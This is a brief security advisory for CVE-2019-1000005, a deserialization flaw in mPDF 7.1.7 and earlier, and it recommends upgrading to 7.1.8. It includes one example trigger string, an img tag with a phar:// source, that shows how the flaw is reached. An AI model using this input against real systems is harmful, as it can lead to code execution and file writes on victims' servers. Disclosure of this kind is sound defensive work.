CVE-2019-1000005

Name of the Vulnerable Software and Affected Versions: mPDF versions 7.1.7 and earlier

Description: The issue is related to a Deserialization of Untrusted Data vulnerability in the getImage() method of the Image/ImageProcessor class. This can result in arbitrary code execution, file write, etc. The attack is exploitable if an attacker hosts a crafted image on the victim server and triggers the generation of a PDF file with content <img src="phar://path/to/crafted/image">.

Recommendations: For mPDF versions 7.1.7 and earlier, update to version 7.1.8 to resolve the issue. As a temporary workaround, consider restricting the use of the getImage() method in the Image/ImageProcessor class until a patch is available. Avoid using the <img src> tag with phar:// protocol in PDF files until the issue is resolved.